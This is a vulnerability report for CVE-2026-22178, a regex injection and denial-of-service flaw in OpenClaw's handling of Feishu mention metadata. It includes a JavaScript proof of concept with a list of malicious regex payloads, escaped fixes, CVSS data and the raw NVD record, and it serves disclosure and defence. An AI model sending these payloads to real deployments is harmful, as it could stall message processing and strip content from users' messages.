Security Vulnerability Report
CVE-2026-22178 CVSS 6.5 MEDIUM


Published: 2026-03-18 02:16:22
Last Modified: 2026-03-19 16:07:51

Description

OpenClaw versions prior to 2026.2.19 construct RegExp objects directly from unescaped Feishu mention metadata in the stripBotMention function, allowing regex injection and denial of service. Attackers can craft nested-quantifier patterns or metacharacters in mention metadata to trigger catastrophic backtracking, block message processing, or remove unintended content before model processing.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
Other scores in the raw record below: Primary v3.1 8.2 HIGH (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H, rating availability impact as HIGH rather than LOW), v4.0 6.9 MEDIUM
Weakness: CWE-1333 (Inefficient Regular Expression Complexity)

Configurations (Affected Products)

cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:* - VULNERABLE
OpenClaw < 2026.2.19

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2026-22178 PoC - Regex Injection via Feishu Mention Metadata
// This PoC demonstrates how malicious mention metadata can trigger ReDoS

// Stand-in for the real metadata extraction: here the message object carries the
// Feishu mention metadata alongside its text.
function extractMentionData(message) {
  return message.mentionData;
}

// Vulnerable code pattern (stripBotMention function)
function stripBotMention(message) {
  // Extract mention metadata from Feishu message
  const mentionData = extractMentionData(message);
  // Directly construct RegExp from unescaped metadata - VULNERABLE!
  const pattern = new RegExp(mentionData.userId, 'gi');
  return message.text.replace(pattern, '');
}

// Malicious payload examples:
const maliciousPayloads = [
  '@user**********', // Invalid pattern: the RegExp constructor throws SyntaxError ("Nothing to repeat")
  '@user(a+)+a',     // Nested quantifiers causing exponential backtracking
  '@user(a*)*b',     // Nested quantifiers pattern
  '@user.{100,}',    // Large repetition causing timeout
  '@user(a+){10}',   // Multiple nested quantifiers
];

// Example exploitation:
const payload = '@user(a+)+a';
const startTime = Date.now();
try {
  const result = stripBotMention({
    text: 'Hello ' + payload + ' how are you?',
    mentionData: { userId: payload },
  });
  console.log('Result:', result, '- processing time:', Date.now() - startTime, 'ms');
} catch (e) {
  // Reached only when the pattern is rejected outright (e.g. SyntaxError);
  // catastrophic backtracking does not throw, it just burns time in replace().
  console.log('Pattern rejected:', e.name, e.message);
}

// Fixed code pattern:
function stripBotMentionFixed(message) {
  const mentionData = extractMentionData(message);
  // Escape special regex characters before constructing RegExp
  const escapedUserId = mentionData.userId.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
  const pattern = new RegExp(escapedUserId, 'gi');
  return message.text.replace(pattern, '');
}
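To make the integrity and availability impacts concrete, the following is an added example (not code from OpenClaw or the advisory) that compares the unescaped construction with an escaped one and with a regex-free one on a constructed message; the function names and the sample message are assumptions.

```javascript
// Added example (not OpenClaw's code): the vulnerable RegExp construction beside
// two hardened forms, compared on constructed input. Function names and the
// sample message are assumptions made for this example.

// Standard metacharacter escaping (the MDN escapeRegExp idiom).
function escapeRegExp(s) {
  return s.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
}

// Vulnerable pattern: the mention key is compiled as a regex, unescaped.
function stripMentionUnsafe(text, mentionKey) {
  return text.replace(new RegExp(mentionKey, 'gi'), '');
}

// Hardened form 1: escape first, so the key can only match itself literally.
function stripMentionEscaped(text, mentionKey) {
  return text.replace(new RegExp(escapeRegExp(mentionKey), 'gi'), '');
}

// Hardened form 2: no RegExp at all. split/join treats the key as a plain string
// (case-sensitive; lower-case both sides first if the match must ignore case).
function stripMentionLiteral(text, mentionKey) {
  return mentionKey ? text.split(mentionKey).join('') : text;
}

// Runs all three on one message and returns what each produced, or the error
// name when the RegExp constructor rejected the key outright.
function compareStrip(text, mentionKey) {
  const variants = {
    unsafe: stripMentionUnsafe,
    escaped: stripMentionEscaped,
    literal: stripMentionLiteral,
  };
  const out = {};
  for (const [name, fn] of Object.entries(variants)) {
    try { out[name] = fn(text, mentionKey); } catch (e) { out[name] = e.name; }
  }
  return out;
}

// Constructed sample message; the keys below stand in for hostile metadata.
const MESSAGE = '@bot please summarise the thread';
// Integrity impact: /.*/ erases the whole message; hardened forms leave it intact.
console.log(compareStrip(MESSAGE, '.*'));
// Availability impact (cheap variant): an invalid pattern throws SyntaxError
// inside message handling; hardened forms again leave the text intact.
console.log(compareStrip(MESSAGE, '**'));
// A genuine mention key is stripped by all three.
console.log(compareStrip(MESSAGE, '@bot'));
```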

References

https://github.com/openclaw/openclaw/commit/74268489137510b6f6349919d1e197b17290d92c (Patch)
https://github.com/openclaw/openclaw/commit/7e67ab75cc2f0e93569d12fecd1411c2961fcc8c (Patch)
https://github.com/openclaw/openclaw/security/advisories/GHSA-c6hr-w26q-c636 (Vendor Advisory)
https://www.vulncheck.com/advisories/openclaw-redos-and-regex-injection-via-unescaped-feishu-mention-metadata (Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22178", "sourceIdentifier": "[email protected]", "published": "2026-03-18T02:16:22.160", "lastModified": "2026-03-19T16:07:51.290", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw versions prior to 2026.2.19 construct RegExp objects directly from unescaped Feishu mention metadata in the stripBotMention function, allowing regex injection and denial of service. Attackers can craft nested-quantifier patterns or metacharacters in mention metadata to trigger catastrophic backtracking, block message processing, or remove unintended content before model processing."}, {"lang": "es", "value": "Las versiones de OpenClaw anteriores a la 2026.2.19 construyen objetos RegExp directamente a partir de metadatos de menciones de Feishu sin escapar en la función stripBotMention, lo que permite la inyección de expresiones regulares y la denegación de servicio. Los atacantes pueden crear patrones de cuantificadores anidados o metacaracteres en los metadatos de las menciones para desencadenar un retroceso catastrófico, bloquear el procesamiento de mensajes o eliminar contenido no deseado antes del procesamiento del modelo."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": 
"NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1333"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", 
"versionEndExcluding": "2026.2.19", "matchCriteriaId": "539A1AE2-E6EC-4FC0-A794-28AA37D76D8E"}]}]}], "references": [{"url": "https://github.com/openclaw/openclaw/commit/74268489137510b6f6349919d1e197b17290d92c", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/commit/7e67ab75cc2f0e93569d12fecd1411c2961fcc8c", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-c6hr-w26q-c636", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/openclaw-redos-and-regex-injection-via-unescaped-feishu-mention-metadata", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}